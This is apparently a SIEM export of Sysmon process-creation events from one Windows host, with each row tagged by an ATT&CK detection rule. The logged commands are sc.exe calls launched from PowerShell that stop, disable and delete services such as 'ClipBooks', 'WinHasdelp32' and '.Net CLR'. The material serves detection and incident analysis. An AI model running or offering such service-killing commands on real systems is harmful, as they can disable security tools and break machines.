Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.349",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.248 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00105fb32e00} +ProcessId: 1440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.252761100Z"",""eventRecordID"":""3530"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.248\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00105fb32e00}\r\nProcessId: 1440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.248"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00105fb32e00}"",""processId"":""1440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.296",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.188 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001040b02e00} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.191394600Z"",""eventRecordID"":""3527"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.188\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001040b02e00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.188"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001040b02e00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.285",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.163 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001043af2e00} +ProcessId: 2496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.166840300Z"",""eventRecordID"":""3526"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.163\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001043af2e00}\r\nProcessId: 2496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.163"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001043af2e00}"",""processId"":""2496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.250",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.114 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00106fad2e00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.129054200Z"",""eventRecordID"":""3524"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.114\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00106fad2e00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.114"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00106fad2e00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.129",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.065 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00100fab2e00} +ProcessId: 1688 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.067822500Z"",""eventRecordID"":""3521"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.065\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00100fab2e00}\r\nProcessId: 1688\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.065"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00100fab2e00}"",""processId"":""1688"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.065",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.023 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00104ea92e00} +ProcessId: 6348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.028297700Z"",""eventRecordID"":""3519"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.023\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00104ea92e00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.023"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00104ea92e00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.026",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.999 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001074a82e00} 